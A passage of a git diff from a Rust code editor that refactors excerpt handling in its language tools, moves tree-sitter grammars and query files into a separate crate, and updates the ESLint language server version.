u32, u32, u32, u32)) { - if is_singleton { - let start = range.start.to_point(snapshot); - let end = range.end.to_point(snapshot); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } else { - let buffer = snapshot.buffer_for_excerpt(excerpt_id); - if let Some(buffer) = buffer { - let start = language::ToPoint::to_point(&range.start.text_anchor, buffer); - let end = 
language::ToPoint::to_point(&range.end.text_anchor, buffer); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } else { - let start = range.start.to_point(snapshot); - let end = range.end.to_point(snapshot); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } - } +) -> Option<(SharedString, BufferId, Range)> { + let start = range.start.to_point(snapshot); + let end = range.end.to_point(snapshot); + let ((start_buffer, start), (_, end)) = snapshot + .point_to_buffer_point(start) + .zip(snapshot.point_to_buffer_point(end))?; + let display = SharedString::from(format!( + "[{}:{} - {}:{}]", + start.row + 1, + start.column + 1, + end.row + 1, + end.column + 1, + )); + Some((display, start_buffer.remote_id(), start..end)) } fn render_style_preview(style: HighlightStyle, selected: bool, cx: &App) -> Div { diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 781c18eb84cbc9ad7a1b666c089a7b65460c327b..43b1736223478fe29f45aac0a712fafad1d2dcbe 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -230,7 +230,7 @@ impl LanguageServerState { ( server_id, ( - status.server_version.clone(), + status.server_readable_version.clone(), status.binary.as_ref().map(|b| b.path.clone()), status.process_id, ), @@ -1179,13 +1179,20 @@ impl StatusItemView for LspButton { .and_then(|active_editor| active_editor.editor.upgrade()) .as_ref() { - let editor_buffers = - HashSet::from_iter(editor.read(cx).buffer().read(cx).excerpt_buffer_ids()); + let editor_buffers = HashSet::from_iter( + editor + .read(cx) + .buffer() + 
.read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id), + ); let _editor_subscription = cx.subscribe_in( &editor, window, |lsp_button, _, e: &EditorEvent, window, cx| match e { - EditorEvent::ExcerptsAdded { buffer, .. } => { + EditorEvent::BufferRangesUpdated { buffer, .. } => { let updated = lsp_button.server_state.update(cx, |state, cx| { if let Some(active_editor) = state.active_editor.as_mut() { let buffer_id = buffer.read(cx).remote_id(); @@ -1198,9 +1205,7 @@ impl StatusItemView for LspButton { lsp_button.refresh_lsp_menu(false, window, cx); } } - EditorEvent::ExcerptsRemoved { - removed_buffer_ids, .. - } => { + EditorEvent::BuffersRemoved { removed_buffer_ids } => { let removed = lsp_button.server_state.update(cx, |state, _| { let mut removed = false; if let Some(active_editor) = state.active_editor.as_mut() { diff --git a/crates/language_tools/src/lsp_log_view.rs b/crates/language_tools/src/lsp_log_view.rs index a4b8977da7661b09b85fff3cbb86c2a3ff1647aa..97f0676d250cac2cee54b307e7c07d894d3d3128 100644 --- a/crates/language_tools/src/lsp_log_view.rs +++ b/crates/language_tools/src/lsp_log_view.rs @@ -18,7 +18,7 @@ use project::{ }; use proto::toggle_lsp_logs::LogType; use std::{any::TypeId, borrow::Cow, sync::Arc}; -use ui::{Button, Checkbox, ContextMenu, Label, PopoverMenu, ToggleState, prelude::*}; +use ui::{Checkbox, ContextMenu, PopoverMenu, ToggleState, prelude::*}; use util::ResultExt as _; use workspace::{ SplitDirection, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, WorkspaceId, @@ -880,6 +880,7 @@ impl SearchableItem for LspLogView { // LSP log is read-only. 
replacement: false, selection: false, + select_all: true, } } fn active_match_index( @@ -969,9 +970,11 @@ impl Render for LspLogToolbarItemView { }) .unwrap_or_else(|| "No server selected".into()), ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view.clone(); @@ -1030,10 +1033,11 @@ impl Render for LspLogToolbarItemView { PopoverMenu::new("LspViewSelector") .anchor(Corner::TopLeft) .trigger( - Button::new("language_server_menu_header", label) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + Button::new("language_server_menu_header", label).end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu(move |window, cx| { let log_toolbar_view = log_toolbar_view.upgrade()?; @@ -1125,9 +1129,11 @@ impl Render for LspLogToolbarItemView { "language_server_trace_level_selector", "Trace level", ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view; @@ -1193,9 +1199,11 @@ impl Render for LspLogToolbarItemView { "language_server_log_level_selector", "Log level", ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view; @@ -1348,6 +1356,7 @@ impl ServerInfo { status: LanguageServerStatus { name: server.name(), server_version: server.version(), + server_readable_version: server.readable_version(), pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), diff --git a/crates/language_tools/src/lsp_log_view_tests.rs 
b/crates/language_tools/src/lsp_log_view_tests.rs index 0b4516f5d052260ac4274e9afe14d3bc1a5ef8ee..476f23ffd82c66a581587d8f8fb70c4192ab04e0 100644 --- a/crates/language_tools/src/lsp_log_view_tests.rs +++ b/crates/language_tools/src/lsp_log_view_tests.rs @@ -109,7 +109,7 @@ fn init_test(cx: &mut gpui::TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); }); } diff --git a/crates/language_tools/src/syntax_tree_view.rs b/crates/language_tools/src/syntax_tree_view.rs index b44d2e05d90733469a5385c2695b3fda3ff47c5e..9c751dd8eaf71272b649b037425caa4aa73b39cc 100644 --- a/crates/language_tools/src/syntax_tree_view.rs +++ b/crates/language_tools/src/syntax_tree_view.rs @@ -1,7 +1,6 @@ use command_palette_hooks::CommandPaletteFilter; use editor::{ - Anchor, Editor, ExcerptId, HighlightKey, MultiBufferOffset, SelectionEffects, - scroll::Autoscroll, + Anchor, Editor, HighlightKey, MultiBufferOffset, SelectionEffects, scroll::Autoscroll, }; use gpui::{ App, AppContext as _, Context, Div, Entity, EntityId, EventEmitter, FocusHandle, Focusable, @@ -125,7 +124,6 @@ impl EditorState { #[derive(Clone)] struct BufferState { buffer: Entity, - excerpt_id: ExcerptId, active_layer: Option, } @@ -253,18 +251,18 @@ impl SyntaxTreeView { let snapshot = editor_state .editor .update(cx, |editor, cx| editor.snapshot(window, cx)); - let (buffer, range, excerpt_id) = editor_state.editor.update(cx, |editor, cx| { + let (buffer, range) = editor_state.editor.update(cx, |editor, cx| { let selection_range = editor .selections .last::(&editor.display_snapshot(cx)) .range(); let multi_buffer = editor.buffer().read(cx); - let (buffer, range, excerpt_id) = snapshot + let (buffer, range, _) = snapshot .buffer_snapshot() - 
.range_to_buffer_ranges(selection_range.start..=selection_range.end) + .range_to_buffer_ranges(selection_range.start..selection_range.end) .pop()?; let buffer = multi_buffer.buffer(buffer.remote_id()).unwrap(); - Some((buffer, range, excerpt_id)) + Some((buffer, range)) })?; // If the cursor has moved into a different excerpt, retrieve a new syntax layer @@ -273,16 +271,14 @@ impl SyntaxTreeView { .active_buffer .get_or_insert_with(|| BufferState { buffer: buffer.clone(), - excerpt_id, active_layer: None, }); let mut prev_layer = None; if did_reparse { prev_layer = buffer_state.active_layer.take(); } - if buffer_state.buffer != buffer || buffer_state.excerpt_id != excerpt_id { + if buffer_state.buffer != buffer { buffer_state.buffer = buffer.clone(); - buffer_state.excerpt_id = excerpt_id; buffer_state.active_layer = None; } @@ -360,8 +356,7 @@ impl SyntaxTreeView { // Build a multibuffer anchor range. let multibuffer = editor_state.editor.read(cx).buffer(); let multibuffer = multibuffer.read(cx).snapshot(cx); - let excerpt_id = buffer_state.excerpt_id; - let range = multibuffer.anchor_range_in_excerpt(excerpt_id, range)?; + let range = multibuffer.buffer_anchor_range_to_anchor_range(range)?; let key = cx.entity_id().as_u64() as usize; // Update the editor with the anchor range. 
diff --git a/crates/languages/Cargo.toml b/crates/languages/Cargo.toml index 8529bdb82ace33d6f3c747ed707b9aac9d319627..93c70d4b27a0b769df521618c22c0700430be2f8 100644 --- a/crates/languages/Cargo.toml +++ b/crates/languages/Cargo.toml @@ -13,24 +13,9 @@ test-support = [ "load-grammars" ] load-grammars = [ + "grammars/load-grammars", "tree-sitter", - "tree-sitter-bash", - "tree-sitter-c", - "tree-sitter-cpp", - "tree-sitter-css", - "tree-sitter-diff", "tree-sitter-gitcommit", - "tree-sitter-go", - "tree-sitter-go-mod", - "tree-sitter-gowork", - "tree-sitter-jsdoc", - "tree-sitter-json", - "tree-sitter-md", - "tree-sitter-python", - "tree-sitter-regex", - "tree-sitter-rust", - "tree-sitter-typescript", - "tree-sitter-yaml", ] [dependencies] @@ -44,6 +29,7 @@ collections.workspace = true futures.workspace = true globset.workspace = true gpui.workspace = true +grammars.workspace = true http_client.workspace = true itertools.workspace = true json_schema_store.workspace = true @@ -62,7 +48,6 @@ pet.workspace = true project.workspace = true regex.workspace = true rope.workspace = true -rust-embed.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true @@ -74,31 +59,14 @@ snippet.workspace = true task.workspace = true terminal.workspace = true theme.workspace = true -toml.workspace = true tree-sitter = { workspace = true, optional = true } -tree-sitter-bash = { workspace = true, optional = true } -tree-sitter-c = { workspace = true, optional = true } -tree-sitter-cpp = { workspace = true, optional = true } -tree-sitter-css = { workspace = true, optional = true } -tree-sitter-diff = { workspace = true, optional = true } tree-sitter-gitcommit = { workspace = true, optional = true } -tree-sitter-go = { workspace = true, optional = true } -tree-sitter-go-mod = { workspace = true, optional = true } -tree-sitter-gowork = { workspace = true, optional = true } -tree-sitter-jsdoc = { workspace = true, optional = true } 
-tree-sitter-json = { workspace = true, optional = true } -tree-sitter-md = { workspace = true, optional = true } -tree-sitter-python = { workspace = true, optional = true } -tree-sitter-regex = { workspace = true, optional = true } -tree-sitter-rust = { workspace = true, optional = true } -tree-sitter-typescript = { workspace = true, optional = true } -tree-sitter-yaml = { workspace = true, optional = true } url.workspace = true util.workspace = true [dev-dependencies] +fs = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -text.workspace = true theme = { workspace = true, features = ["test-support"] } tree-sitter-bash.workspace = true tree-sitter-c.workspace = true @@ -106,7 +74,7 @@ tree-sitter-cpp.workspace = true tree-sitter-css.workspace = true tree-sitter-go.workspace = true tree-sitter-python.workspace = true +tree-sitter-rust.workspace = true tree-sitter-typescript.workspace = true tree-sitter.workspace = true unindent.workspace = true -workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/languages/src/bash/brackets.scm b/crates/languages/src/bash/brackets.scm deleted file mode 100644 index 88a2a1b67f602afb4e7de21a0ec0a523d33e37ee..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/brackets.scm +++ /dev/null @@ -1,12 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -(("do" @open "done" @close) (#set! newline.only) (#set! rainbow.exclude)) -((case_statement ("in" @open "esac" @close)) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement (elif_clause ("then" @open)) (else_clause ("else" @close))) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement (else_clause ("else" @open)) "fi" @close) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement ("then" @open) (elif_clause ("elif" @close))) (#set! newline.only) (#set! 
rainbow.exclude)) -((if_statement ("then" @open) (else_clause ("else" @close))) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement ("then" @open "fi" @close)) (#set! newline.only) (#set! rainbow.exclude)) diff --git a/crates/languages/src/bash/injections.scm b/crates/languages/src/bash/injections.scm deleted file mode 100644 index 9117c713b98fdd2896b13e4949a77c6489b9ee36..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/injections.scm +++ /dev/null @@ -1,3 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) diff --git a/crates/languages/src/bash/redactions.scm b/crates/languages/src/bash/redactions.scm deleted file mode 100644 index 000cb042a573112a7d3c46f56862ba4119fdfdf3..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/redactions.scm +++ /dev/null @@ -1,2 +0,0 @@ -(variable_assignment - value: (_) @redact) diff --git a/crates/languages/src/bash/runnables.scm b/crates/languages/src/bash/runnables.scm deleted file mode 100644 index c88e549347b4d4897c43d22d24550f3904d8c5d1..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/runnables.scm +++ /dev/null @@ -1,5 +0,0 @@ -; Run bash scripts -( - (program . (_) @run) @_bash-script - (#set! 
tag bash-script) -) diff --git a/crates/languages/src/c.rs b/crates/languages/src/c.rs index 3a9207329d58a60acb0da42699116336d4528c97..bc75a9dbabbf0687124da5e35e6435ebc377e854 100644 --- a/crates/languages/src/c.rs +++ b/crates/languages/src/c.rs @@ -368,7 +368,7 @@ impl super::LspAdapter for CLspAdapter { Ok(original) } - fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic, _: &App) -> bool { + fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic) -> bool { clangd_ext::is_inactive_region(previous_diagnostic) } diff --git a/crates/languages/src/c/brackets.scm b/crates/languages/src/c/brackets.scm deleted file mode 100644 index 2149bddc6c9a7ec04667d03da75580b676e12a28..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/brackets.scm +++ /dev/null @@ -1,5 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/c/imports.scm b/crates/languages/src/c/imports.scm deleted file mode 100644 index c3c2c9e68c4503d323d039f9c042d9501b5e4126..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/imports.scm +++ /dev/null @@ -1,7 +0,0 @@ -(preproc_include - path: [ - ( - (system_lib_string) @source @wildcard - (#strip! 
@source "[<>]")) - (string_literal (string_content) @source @wildcard) - ]) @import diff --git a/crates/languages/src/c/outline.scm b/crates/languages/src/c/outline.scm deleted file mode 100644 index efd911836cb718d698460adfe2d91d19cb976b30..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/outline.scm +++ /dev/null @@ -1,91 +0,0 @@ -(preproc_def - "#define" @context - name: (_) @name) @item - -(preproc_function_def - "#define" @context - name: (_) @name - parameters: (preproc_params - "(" @context - ")" @context)) @item - -(struct_specifier - "struct" @context - name: (_) @name) @item - -(union_specifier - "union" @context - name: (_) @name) @item - -(enum_specifier - "enum" @context - name: (_) @name) @item - -(enumerator - name: (_) @name) @item - -(field_declaration - type: (_) @context - declarator: (field_identifier) @name) @item - -(type_definition - "typedef" @context - declarator: (_) @name) @item - -(declaration - (type_qualifier)? @context - type: (_)? @context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - ] -) @item - -(function_definition - (type_qualifier)? @context - type: (_)? 
@context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - ] -) @item - -(comment) @annotation diff --git a/crates/languages/src/c/runnables.scm b/crates/languages/src/c/runnables.scm deleted file mode 100644 index 5a203f5d7a6eea3ab831a1b4281a74d3795ca74f..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/runnables.scm +++ /dev/null @@ -1,10 +0,0 @@ -; Tag the main function -( - (function_definition - declarator: (function_declarator - declarator: (identifier) @run - ) - ) @_c-main - (#eq? @run "main") - (#set! tag c-main) -) diff --git a/crates/languages/src/c/textobjects.scm b/crates/languages/src/c/textobjects.scm deleted file mode 100644 index e29f508b701c8ee22eec27af47d899d446e67860..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/textobjects.scm +++ /dev/null @@ -1,31 +0,0 @@ -(declaration - declarator: (function_declarator)) @function.around - -(function_definition - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -(preproc_function_def - value: (_) @function.inside) @function.around - -(comment) @comment.around - -(struct_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(enum_specifier - body: (_ - "{" - [(_) ","?]* @class.inside - "}")) @class.around - -(union_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around diff --git a/crates/languages/src/cpp.rs b/crates/languages/src/cpp.rs index 85a3fb5045275648282c7a8cbad58779491ad7dc..5985baa54808b86a62e9d7ade38dca3480931459 100644 --- a/crates/languages/src/cpp.rs +++ 
b/crates/languages/src/cpp.rs @@ -1,3 +1,13 @@ +use settings::SemanticTokenRules; + +pub(crate) fn semantic_token_rules() -> SemanticTokenRules { + let content = grammars::get_file("cpp/semantic_token_rules.json") + .expect("missing cpp/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse cpp semantic_token_rules.json") +} + #[cfg(test)] mod tests { use gpui::{AppContext as _, BorrowAppContext, TestAppContext}; diff --git a/crates/languages/src/cpp/brackets.scm b/crates/languages/src/cpp/brackets.scm deleted file mode 100644 index 9eaebba332861ef716902b3827d4940b71f37221..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/brackets.scm +++ /dev/null @@ -1,6 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/cpp/imports.scm b/crates/languages/src/cpp/imports.scm deleted file mode 100644 index a4ef817a80dbcd44336bdd8cd681587662aad435..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/imports.scm +++ /dev/null @@ -1,5 +0,0 @@ -(preproc_include - path: [ - ((system_lib_string) @source @wildcard) - (string_literal (string_content) @source @wildcard) - ]) @import diff --git a/crates/languages/src/cpp/indents.scm b/crates/languages/src/cpp/indents.scm deleted file mode 100644 index 985ebda6ffe679f479804d667db011587eacb2f9..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/indents.scm +++ /dev/null @@ -1,23 +0,0 @@ -[ - (field_expression) - (assignment_expression) - (init_declarator) - (if_statement) - (for_statement) - (while_statement) - (do_statement) - (else_clause) -] @indent - -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -((comment) @indent - (#match? 
@indent "^/\\*")) - -(if_statement) @start.if -(for_statement) @start.for -(while_statement) @start.while -(do_statement) @start.do -(switch_statement) @start.switch -(else_clause) @start.else diff --git a/crates/languages/src/cpp/outline.scm b/crates/languages/src/cpp/outline.scm deleted file mode 100644 index 75be97a916dca9f10b044ee9dc01eca09e6372ec..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/outline.scm +++ /dev/null @@ -1,186 +0,0 @@ -(preproc_def - "#define" @context - name: (_) @name) @item - -(preproc_function_def - "#define" @context - name: (_) @name - parameters: (preproc_params - "(" @context - ")" @context)) @item - -(namespace_definition - "inline"? @context - "namespace" @context - name: (_) @name) @item - -(type_definition - "typedef" @context - declarator: (_) @name) @item - -(struct_specifier - "struct" @context - name: (_) @name) @item - -(class_specifier - "class" @context - name: (_) @name) @item - -(enum_specifier - "enum" @context - [ - "class" - "struct" - ]? @context - name: (_) @name) @item - -(union_specifier - "union" @context - name: (_) @name) @item - -(enumerator - name: (_) @name) @item - -(concept_definition - "concept" @context - name: (_) @name) @item - -(declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_) @context - declarator: [ - ; The declaration may define multiple variables, using @item on the - ; declarator so that they get distinct ranges. - (init_declarator - declarator: (_) @item @name) - (identifier) @item @name - ] @item) - -(function_definition - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_)? 
@context - declarator: [ - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ] - (type_qualifier)? @context) @item - -(declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_)? @context - declarator: [ - (field_identifier) @name - (pointer_declarator - "*" @context - declarator: (field_identifier) @name) - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ] - (type_qualifier)? 
@context) @item - -(field_declaration - [ - (storage_class_specifier) - (type_qualifier) - ]* @context - type: (_) @context - declarator: [ - (field_identifier) @name - (pointer_declarator - "*" @context - declarator: (field_identifier) @name) - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) - (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - (pointer_declarator - "*" @context - declarator: (pointer_declarator - "*" @context - declarator: (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)))) - (reference_declarator - ["&" "&&"] @context - (function_declarator - declarator: (_) @name - parameters: (parameter_list - "(" @context - ")" @context))) - ; Fields declarations may define multiple fields, and so @item is on the - ; declarator so they each get distinct ranges. - ] @item - (type_qualifier)? @context) - -(comment) @annotation diff --git a/crates/languages/src/cpp/textobjects.scm b/crates/languages/src/cpp/textobjects.scm deleted file mode 100644 index 027185a0cfab7b71f3dcd6a5d5507445e2778d34..0000000000000000000000000000000000000000 --- a/crates/languages/src/cpp/textobjects.scm +++ /dev/null @@ -1,37 +0,0 @@ -(declaration - declarator: (function_declarator)) @function.around - -(function_definition - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -(preproc_function_def - value: (_) @function.inside) @function.around - -(comment) @comment.around - -(struct_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(enum_specifier - body: (_ - "{" - [(_) ","?]* @class.inside - "}")) @class.around - -(union_specifier - body: (_ - "{" - (_)* @class.inside - "}")) @class.around - -(class_specifier - body: (_ - "{" - [(_) ":"? 
";"?]* @class.inside - "}"?)) @class.around diff --git a/crates/languages/src/css.rs b/crates/languages/src/css.rs index c5c89a0c66431380cf9f500a23b74a19230f3046..6a8fb730a0faa6430d252cdd189d0620fcd07e4a 100644 --- a/crates/languages/src/css.rs +++ b/crates/languages/src/css.rs @@ -134,6 +134,7 @@ impl LspAdapter for CssLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true diff --git a/crates/languages/src/css/brackets.scm b/crates/languages/src/css/brackets.scm deleted file mode 100644 index 2149bddc6c9a7ec04667d03da75580b676e12a28..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/brackets.scm +++ /dev/null @@ -1,5 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/css/indents.scm b/crates/languages/src/css/indents.scm deleted file mode 100644 index e9754690920500f55e611f981e46d0365560eb4f..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/indents.scm +++ /dev/null @@ -1 +0,0 @@ -(_ "{" "}" @end) @indent diff --git a/crates/languages/src/css/injections.scm b/crates/languages/src/css/injections.scm deleted file mode 100644 index 9117c713b98fdd2896b13e4949a77c6489b9ee36..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/injections.scm +++ /dev/null @@ -1,3 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) diff --git a/crates/languages/src/css/outline.scm b/crates/languages/src/css/outline.scm deleted file mode 100644 index 645616f9056d0cc9e85232e94f5d0666809884c6..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/outline.scm +++ /dev/null @@ -1,18 +0,0 @@ -(stylesheet - (import_statement - "@import" @context - ((string_value) @name)) @item) - - -(rule_set - (selectors - . 
- (_) @name - ("," @name (_) @name)* - )) @item - -(media_statement - "@media" @context - (_) @name - (block) -) @item diff --git a/crates/languages/src/css/textobjects.scm b/crates/languages/src/css/textobjects.scm deleted file mode 100644 index c9c6207b851e6b4c5908ce7d664616798db27f3b..0000000000000000000000000000000000000000 --- a/crates/languages/src/css/textobjects.scm +++ /dev/null @@ -1,30 +0,0 @@ -(comment) @comment.around - -(rule_set - (block ( - "{" - (_)* @function.inside - "}" ))) @function.around -(keyframe_block - (block ( - "{" - (_)* @function.inside - "}" ))) @function.around - -(media_statement - (block ( - "{" - (_)* @class.inside - "}" ))) @class.around - -(supports_statement - (block ( - "{" - (_)* @class.inside - "}" ))) @class.around - -(keyframes_statement - (keyframe_block_list ( - "{" - (_)* @class.inside - "}" ))) @class.around diff --git a/crates/languages/src/diff/injections.scm b/crates/languages/src/diff/injections.scm deleted file mode 100644 index 01e833d1e31d480b66a558bdfb8f07b2f0cdbc46..0000000000000000000000000000000000000000 --- a/crates/languages/src/diff/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! 
injection.language "comment")) diff --git a/crates/languages/src/eslint.rs b/crates/languages/src/eslint.rs index 943034652de852b2c39b4887218c3c8e28f329e1..7ef55c64ef1b35fa42f35e779c4cf46b30a18ee5 100644 --- a/crates/languages/src/eslint.rs +++ b/crates/languages/src/eslint.rs @@ -7,8 +7,10 @@ use http_client::{ }; use language::{LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain}; use lsp::{CodeActionKind, LanguageServerBinary, LanguageServerName, Uri}; -use node_runtime::NodeRuntime; +use node_runtime::{NodeRuntime, read_package_installed_version}; +use project::Fs; use project::lsp_store::language_server_settings_for; +use semver::Version; use serde::{Deserialize, Serialize}; use serde_json::{Value, json}; use settings::SettingsLocation; @@ -31,11 +33,12 @@ fn eslint_server_binary_arguments(server_path: &Path) -> Vec { pub struct EsLintLspAdapter { node: NodeRuntime, + fs: Arc, } impl EsLintLspAdapter { - const CURRENT_VERSION: &'static str = "2.4.4"; - const CURRENT_VERSION_TAG_NAME: &'static str = "release/2.4.4"; + const CURRENT_VERSION: &'static str = "3.0.24"; + const CURRENT_VERSION_TAG_NAME: &'static str = "release/3.0.24"; #[cfg(not(windows))] const GITHUB_ASSET_KIND: AssetKind = AssetKind::TarGz; @@ -45,7 +48,10 @@ impl EsLintLspAdapter { const SERVER_PATH: &'static str = "vscode-eslint/server/out/eslintServer.js"; const SERVER_NAME: LanguageServerName = LanguageServerName::new_static("eslint"); - const FLAT_CONFIG_FILE_NAMES: &'static [&'static str] = &[ + const FLAT_CONFIG_FILE_NAMES_V8_21: &'static [&'static str] = &["eslint.config.js"]; + const FLAT_CONFIG_FILE_NAMES_V8_57: &'static [&'static str] = + &["eslint.config.js", "eslint.config.mjs", "eslint.config.cjs"]; + const FLAT_CONFIG_FILE_NAMES_V10: &'static [&'static str] = &[ "eslint.config.js", "eslint.config.mjs", "eslint.config.cjs", @@ -53,9 +59,17 @@ impl EsLintLspAdapter { "eslint.config.cts", "eslint.config.mts", ]; + const LEGACY_CONFIG_FILE_NAMES: &'static [&'static str] = &[ + 
